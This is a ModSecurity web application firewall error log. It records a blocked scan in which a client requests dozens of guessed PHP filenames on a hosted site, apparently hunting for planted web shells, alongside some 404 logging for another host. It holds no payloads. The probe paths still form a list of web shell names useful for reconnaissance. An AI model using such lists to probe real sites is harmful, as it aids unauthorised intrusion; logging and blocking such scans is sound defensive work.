[Tue May 26 19:07:02.314409 2026] [security2:error] [pid 6038:tid 6197] [client 20.104.227.76:10693] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/man.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qizAAAAKI"]
[Tue May 26 19:07:02.472785 2026] [security2:error] [pid 6038:tid 6284] [client 20.104.227.76:10720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/ms-edit.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qi0AAAAPk"]
[Tue May 26 19:07:02.472900 2026] [security2:error] [pid 6038:tid 6284] [client 20.104.227.76:10720] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/ms-edit.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qi0AAAAPk"]
[Tue May 26 19:07:02.623692 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:10304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/7.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qi1QAAAMA"]
[Tue May 26 19:07:02.623794 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:10304] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/7.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qi1QAAAMA"]
[Tue May 26 19:07:02.772285 2026] [security2:error] [pid 6038:tid 6206] [client 20.104.227.76:8323] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/pp.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qi2QAAAKs"]
[Tue May 26 19:07:02.772410 2026] [security2:error] [pid 6038:tid 6206] [client 20.104.227.76:8323] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/pp.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qi2QAAAKs"]
[Tue May 26 19:07:02.920369 2026] [security2:error] [pid 6038:tid 6198] [client 20.104.227.76:10699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/mar.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qi4AAAAKM"]
[Tue May 26 19:07:02.920522 2026] [security2:error] [pid 6038:tid 6198] [client 20.104.227.76:10699] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/mar.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qi4AAAAKM"]
[Tue May 26 19:07:03.043514 2026] [security2:error] [pid 6038:tid 6253] [client 20.12.190.196:40962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/xminie.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi4QAAANo"]
[Tue May 26 19:07:03.043596 2026] [security2:error] [pid 6038:tid 6253] [client 20.12.190.196:40962] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/xminie.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi4QAAANo"]
[Tue May 26 19:07:03.062777 2026] [security2:error] [pid 6038:tid 6240] [client 20.104.227.76:8343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/acp.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi4gAAAM0"]
[Tue May 26 19:07:03.062856 2026] [security2:error] [pid 6038:tid 6240] [client 20.104.227.76:8343] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/acp.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi4gAAAM0"]
[Tue May 26 19:07:03.224956 2026] [security2:error] [pid 6038:tid 6268] [client 20.104.227.76:10316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/zdd.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi5gAAAOk"]
[Tue May 26 19:07:03.225041 2026] [security2:error] [pid 6038:tid 6268] [client 20.104.227.76:10316] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/zdd.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi5gAAAOk"]
[Tue May 26 19:07:03.380255 2026] [security2:error] [pid 6038:tid 6242] [client 20.104.227.76:8336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/link.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi6QAAAM8"]
[Tue May 26 19:07:03.380357 2026] [security2:error] [pid 6038:tid 6242] [client 20.104.227.76:8336] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/link.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi6QAAAM8"]
[Tue May 26 19:07:03.591163 2026] [security2:error] [pid 6038:tid 6190] [client 20.104.227.76:10328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/sallu.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi8wAAAJs"]
[Tue May 26 19:07:03.591273 2026] [security2:error] [pid 6038:tid 6190] [client 20.104.227.76:10328] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/sallu.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi8wAAAJs"]
[Tue May 26 19:07:03.743274 2026] [security2:error] [pid 6038:tid 6176] [client 20.104.227.76:10358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/aboute.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi9AAAAI0"]
[Tue May 26 19:07:03.743391 2026] [security2:error] [pid 6038:tid 6176] [client 20.104.227.76:10358] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/aboute.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi9AAAAI0"]
[Tue May 26 19:07:03.939345 2026] [security2:error] [pid 6038:tid 6218] [client 20.104.227.76:8379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/one.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi_AAAALc"]
[Tue May 26 19:07:03.939477 2026] [security2:error] [pid 6038:tid 6218] [client 20.104.227.76:8379] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/one.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi_AAAALc"]
[Tue May 26 19:07:03.996506 2026] [security2:error] [pid 6038:tid 6262] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh_1HA3ZmGrHHEr4qi8gAAAOM"]
[Tue May 26 19:07:04.085877 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:8348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/tx79.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjCQAAAMA"]
[Tue May 26 19:07:04.085991 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:8348] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/tx79.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjCQAAAMA"]
[Tue May 26 19:07:04.230934 2026] [security2:error] [pid 6038:tid 6278] [client 20.104.227.76:10710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-class.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjDQAAAPM"]
[Tue May 26 19:07:04.231013 2026] [security2:error] [pid 6038:tid 6278] [client 20.104.227.76:10710] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-class.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjDQAAAPM"]
[Tue May 26 19:07:04.374614 2026] [security2:error] [pid 6038:tid 6274] [client 20.104.227.76:8362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/8.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjFwAAAO8"]
[Tue May 26 19:07:04.374720 2026] [security2:error] [pid 6038:tid 6274] [client 20.104.227.76:8362] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/8.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjFwAAAO8"]
[Tue May 26 19:07:04.531888 2026] [security2:error] [pid 6038:tid 6237] [client 20.104.227.76:8320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/options.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjIgAAAMo"]
[Tue May 26 19:07:04.531991 2026] [security2:error] [pid 6038:tid 6237] [client 20.104.227.76:8320] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/options.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjIgAAAMo"]
[Tue May 26 19:07:04.692400 2026] [security2:error] [pid 6038:tid 6280] [client 20.104.227.76:10733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/f5.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjKgAAAPU"]
[Tue May 26 19:07:04.692487 2026] [security2:error] [pid 6038:tid 6280] [client 20.104.227.76:10733] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/f5.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjKgAAAPU"]
[Tue May 26 19:07:04.841547 2026] [security2:error] [pid 6038:tid 6235] [client 20.104.227.76:10341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/alpha.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjMwAAAMg"]
[Tue May 26 19:07:04.841740 2026] [security2:error] [pid 6038:tid 6235] [client 20.104.227.76:10341] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/alpha.php"] [unique_id "ahWiAFHA3ZmGrHHEr4qjMwAAAMg"]
[Tue May 26 19:07:05.009354 2026] [security2:error] [pid 6038:tid 6213] [client 20.104.227.76:8327] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/son1.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjOAAAALI"]
[Tue May 26 19:07:05.009462 2026] [security2:error] [pid 6038:tid 6213] [client 20.104.227.76:8327] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/son1.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjOAAAALI"]
[Tue May 26 19:07:05.159453 2026] [security2:error] [pid 6038:tid 6211] [client 20.104.227.76:10695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/ggb.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjQgAAALA"]
[Tue May 26 19:07:05.159537 2026] [security2:error] [pid 6038:tid 6211] [client 20.104.227.76:10695] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/ggb.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjQgAAALA"]
[Tue May 26 19:07:05.319349 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:10337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/ss.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjSQAAAMA"]
[Tue May 26 19:07:05.319506 2026] [security2:error] [pid 6038:tid 6227] [client 20.104.227.76:10337] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/ss.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjSQAAAMA"]
[Tue May 26 19:07:05.461652 2026] [security2:error] [pid 6038:tid 6230] [client 20.104.227.76:10738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/rh.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjTQAAAMM"]
[Tue May 26 19:07:05.461754 2026] [security2:error] [pid 6038:tid 6230] [client 20.104.227.76:10738] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/rh.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjTQAAAMM"]
[Tue May 26 19:07:05.621815 2026] [security2:error] [pid 6038:tid 6225] [client 20.104.227.76:8344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/99.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjWAAAAL4"]
[Tue May 26 19:07:05.621939 2026] [security2:error] [pid 6038:tid 6225] [client 20.104.227.76:8344] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/99.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjWAAAAL4"]
[Tue May 26 19:07:05.765010 2026] [security2:error] [pid 6038:tid 6272] [client 20.104.227.76:10714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/layout.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjYQAAAO0"]
[Tue May 26 19:07:05.765122 2026] [security2:error] [pid 6038:tid 6272] [client 20.104.227.76:10714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/layout.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjYQAAAO0"]
[Tue May 26 19:07:05.919899 2026] [security2:error] [pid 6038:tid 6280] [client 20.104.227.76:10310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/12.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjaAAAAPU"]
[Tue May 26 19:07:05.920012 2026] [security2:error] [pid 6038:tid 6280] [client 20.104.227.76:10310] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/12.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjaAAAAPU"]
[Tue May 26 19:07:06.071808 2026] [security2:error] [pid 6038:tid 6222] [client 20.104.227.76:10321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/fs.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjbwAAALs"]
[Tue May 26 19:07:06.071907 2026] [security2:error] [pid 6038:tid 6222] [client 20.104.227.76:10321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/fs.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjbwAAALs"]
[Tue May 26 19:07:06.157790 2026] [security2:error] [pid 6038:tid 6273] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiAVHA3ZmGrHHEr4qjXQAAAO4"]
[Tue May 26 19:07:06.226711 2026] [security2:error] [pid 6038:tid 6204] [client 20.104.227.76:10331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/aaa.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjfgAAAKk"]
[Tue May 26 19:07:06.226839 2026] [security2:error] [pid 6038:tid 6204] [client 20.104.227.76:10331] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/aaa.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjfgAAAKk"]
[Tue May 26 19:07:06.373022 2026] [security2:error] [pid 6038:tid 6263] [client 20.104.227.76:10355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/Ov-Simple1.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjggAAAOQ"]
[Tue May 26 19:07:06.373135 2026] [security2:error] [pid 6038:tid 6263] [client 20.104.227.76:10355] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/Ov-Simple1.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjggAAAOQ"]
[Tue May 26 19:07:06.573981 2026] [security2:error] [pid 6038:tid 6262] [client 20.104.227.76:10365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/a5.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjjAAAAOM"]
[Tue May 26 19:07:06.574070 2026] [security2:error] [pid 6038:tid 6262] [client 20.104.227.76:10365] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/a5.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjjAAAAOM"]
[Tue May 26 19:07:06.722274 2026] [security2:error] [pid 6038:tid 6181] [client 20.104.227.76:10345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/hplfuns.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjmQAAAJI"]
[Tue May 26 19:07:06.722389 2026] [security2:error] [pid 6038:tid 6181] [client 20.104.227.76:10345] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/hplfuns.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjmQAAAJI"]
[Tue May 26 19:07:06.867174 2026] [security2:error] [pid 6038:tid 6224] [client 20.104.227.76:10744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/bolt.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjoAAAAL0"]
[Tue May 26 19:07:06.867276 2026] [security2:error] [pid 6038:tid 6224] [client 20.104.227.76:10744] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/bolt.php"] [unique_id "ahWiAlHA3ZmGrHHEr4qjoAAAAL0"]
